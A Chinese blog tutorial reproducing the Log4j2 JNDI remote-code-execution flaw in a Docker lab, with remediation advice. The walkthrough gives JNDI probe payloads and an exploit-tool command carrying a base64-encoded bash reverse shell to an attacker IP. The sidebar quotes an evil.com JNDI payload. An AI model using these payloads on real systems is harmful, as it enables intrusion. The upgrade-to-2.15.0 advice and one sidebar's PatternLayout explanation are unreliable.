CVE-2021-44228——Log4j2-RCE漏洞复现

已于 2024-01-25 16:11:35 修改
阅读量1.7k 收藏 3
点赞数 1
分类专栏: 漏洞复现篇 文章标签: 安全
于 2022-06-10 14:47:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42181573/article/details/125220452
版权

漏洞介绍

Apache Log4j2是一个基于java的日志记录工具。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。

影响版本

Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.2、2.12.3 和 2.3.1)

环境搭建

  1. 使用docker搭建vulfocus的漏洞靶场
docker pull vulfocus/log4j2-rce-2021-12-09:latest
docker run -d -p 80:8080 vulfocus/log4j2-rce-2021-12-09:latest
  1. 浏览器访问http://192.168.130.180,部署成功
    在这里插入图片描述

漏洞复现

  1. 通过DNSLog平台获取到域名klcbkf.dnslog.cn在这里插入图片描述
  2. 浏览器点击???,并使用Burpsuite进行抓包,构造payload:${jndi:111.klcbkf.dnslog.cn},此时若直接发包会导致服务器400错误,通过Burpsuite自带的编码工具对其进行URL编码,编码后再次发送请求
    在这里插入图片描述在这里插入图片描述
  3. 在DNSLog网站成功接收到解析记录,证明存在Log4j2-RCE漏洞
    在这里插入图片描述
  4. 使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar进行漏洞利用
    在这里插入图片描述
使用方式:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

反弹shell指令:
bash -i >& /dev/tcp/ip/port 0>&1

此处ip为攻击机IP,port可使用任意未被占用的端口,将此条命令进行Java Runtime Bash 编码:
bash -i >& /dev/tcp/192.168.130.152/4444 0>&1

编码地址:https://www.jackson-t.ca/runtime-exec-payloads.html

编码后的命令通过-C参数输入JNDI工具,通过通过-A参数指定攻击机的ip地址:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzMC4xNTIvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" -A 192.168.130.152

  1. 在新的窗口监听4444端口
    在这里插入图片描述

  2. 替换工具生成的payload:rmi://192.168.130.152:1099/opx68u 到Burpsuite,编码后发送到攻击机
    在这里插入图片描述

  3. 攻击机的监听窗口成功接收到反弹的shell:
    在这里插入图片描述

修复建议

官方方案

  • 将Log4j框架升级到2.15.0版本, 不要用2.15.0-rc1和2.15.0-rc2

临时方案

  • 升级JDK

  • 修改log4j配置

    ①设置参数:
    log4j2.formatMsgNoLookups=True
    ②修改jvm参数:
    -Dlog4j2.formatMsgNoLookups=true
    ③系统环境变量:
    FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS设置为true
    ④禁止log4j2所在的服务器外连

  • 使用安全产品防护:WAF、RASP

Li-D
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Java 6 将 log4j 升级到 2.3.2 版本,Java 7 将 log4j 升级到 2.12.4 版本,Java 8 或更高版本将 log4j 升级到 2.17.1 版本
Apache Log4j2漏洞 (CVE-2021-44228) 分析与
未完成的歌~的博客
03-15 5371
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
漏洞】Apache log4j RCE 远程代码执行漏洞(CVE-2021-44228)
qq_45244158的博客
12-14 5501
Log4j任意代码执行RCE(CVE-2021-44228)前言一、漏洞描述二、受影响的版本三、过程1.从Vulfocus靶场获取测试环境2.攻击过程四、修建议1.升级到最新版本2.缓解措施3.流量查询 前言 2021年11月24日,阿里云安全团队正式向Apache报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2的部分功能具有递归分析功能,攻击者可以直接构造恶意请求触发远程代码执行漏洞。 一、漏洞描述 Apache Log4j2 是一个基于 Java 的日志工具。这
CVE-2021-44228漏洞
最新发布
m0_65764670的博客
05-29 1075
漏洞log4j2漏洞log4j2是java语言的日志处理套件,使用很广泛。在2.0到2.14.1版本中存在JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似'${jndi:ldap://evil.com/example}'​的参数进行JNDI注入,执行任意代码(注:Java环境1.8也可能会存在)什么是JNDI?
apache log4j 2(CVE-2021-44228)漏洞
net的博客
04-04 851
这个漏洞的根本原因在于log4j的默认配置允许使用解析日志消息中的对象。攻击者可以构造恶意的日志消息,其中包含一个恶意的Java对象,当log4j尝试解析这个对象时,它将会触发漏洞,导致攻击者能够执行任意代码。然而,我们没有对用户输入进行任何过滤或验证,这意味着如果用户输入包含恶意代码,它将会被记录到日志文件中。JNDI 的一种实,允许按照具体的名称逻辑查找对象的位置,并输出对象的内容,此对象可以通过Java。协议,能从远程服务区上请求恶意的对象,对象在调用的过程中会被解析执行,导致了Log4j。
Log4j2 zero day(CVE-2021-44228) 漏洞浅析
swf3389的博客
12-18 3051
引言: 不管是什么编程语言,不管是前端后端还是客户端,对打日志都不会陌生。通过日志,可以帮助我们了解程序的运行情况,排查程序运行中出的问题。在Java技术栈中,用的比较多的日志输出框架主要是log4j2和logback。我们经常会在日志中输出一些变量,比如:logger.info(“proj name: {}”, name),那作为一个优秀的全异步日志框架log4j2是否就是完美无瑕的呢?No,当然不是,最近全球知名开源日志组件 Apache Log4j2 被阿里团队曝出严重高危漏洞。该漏洞号称可以让黑客
CVE-2021-44228 Log4j2漏洞
Cover-3321的博客
01-07 1806
apache log4j: 是java语言中的日志处理套件/程序。2.0-2.14.1存在JNDI注入漏洞,导致攻击者可以控制日志内容的情况下,传入${jndi:ldap://xxxxxx.com/rce}的参数进行JNDI注入,执行远程命令。
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
06-22
OpenSSH 资源管理错误漏洞(CVE-2021-28041) OpenSSH 是一个开源的 SSH 服务器实,广泛应用于 Linux、Unix 和 Windows 等操作系统中。然而,OpenSSH 也存在一些安全漏洞,其中之一就是资源管理错误漏洞(CVE-2021-...
CVE-2021-22192:CVE-2021-22192靶场:未授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:未授权用户RCE漏洞0x10靶场环境0x20目录结构CVE-2021-22192├── README.md ............... [此 README 说明]├── imgs .................... [辅助 README 说明的图片]├─...
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
【vulhub】Log4j2:CVE-2021-44228漏洞
weixin_49422491的博客
09-13 2699
【vulhub】Log4j2:CVE-2021-44228漏洞
CVE-2021-44228:log4j2漏洞
fainpo的博客
05-07 278
漏洞适用版本:2.0 <= Apache log4j2 <= 2.14.1。
Apache Log4j2紧急缓解措施
weixin_45270673的博客
12-16 1697
Apache Log4j2紧急缓解措施 一、修改启动脚本,添加:-Dlog4j2.formatMsgNoLookups 在:java -jar xxx.jar 改为:java -jar -Dlog4j2.formatMsgNoLookups=true xxx.jar 二、修改配置jar包中的配置文件 application.properties #log4j2 log4j2.formatMsgNoLookups=True 配置文件是application.yml改为: #log4j2 log4j2: f
apache log4j2 任意代码执行漏洞(cve-2021-44228)
09-18
Apache Log4j2是一个广泛使用的开源日志管理工具。然而,最近发了一个严重的漏洞,被命名为CVE-2021-44228。这个漏洞允许攻击者通过恶意构造的日志事件来执行任意代码,导致系统被远程攻击者完全控制。 漏洞是由于Log4j2中的PatternLayout布局处理器存在一个特定的模式转换字符(%d、%i、%m、%p等)被恶意利用的问题。攻击者可以将恶意代码嵌入到日志事件中,并通过向受影响的Log4j2实例发送恶意请求触发此漏洞。一旦攻击成功,攻击者可以在受影响的应用程序上执行任意的远程代码。 这个漏洞的危害性非常高,因为日志功能几乎在每个应用程序中都得到广泛使用。攻击者可以通过恶意日志事件执行各种攻击,包括远程命令执行、数据库注入、代码执行等。受影响的应用程序可能会泄露敏感数据、遭受损坏甚至被完全控制。 解决这个漏洞的最佳方法是升级到Log4j2的最新版本。Apache已经发布了修漏洞的版本,更具体地说是2.15.0和2.16.0,这些版本不再处理这类模式转换字符。如果无法立即更新,可以考虑在应用程序中禁用PatternLayout布局处理器,或者使用其他日志管理框架替代Log4j2。 此外,还建议及时监测应用程序的日志活动,并对异常的日志事件进行审查。如果遇到可疑的日志事件,应立即采取行动,例如暂停相关服务、排查日志事件来源、加强网络安全防护等。 总之,Apache Log4j2的CVE-2021-44228漏洞是一个严重的安全威胁,可能导致系统被完全控制。及时升级到修版本、加强监控和审查日志活动是应对该漏洞的关键步骤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值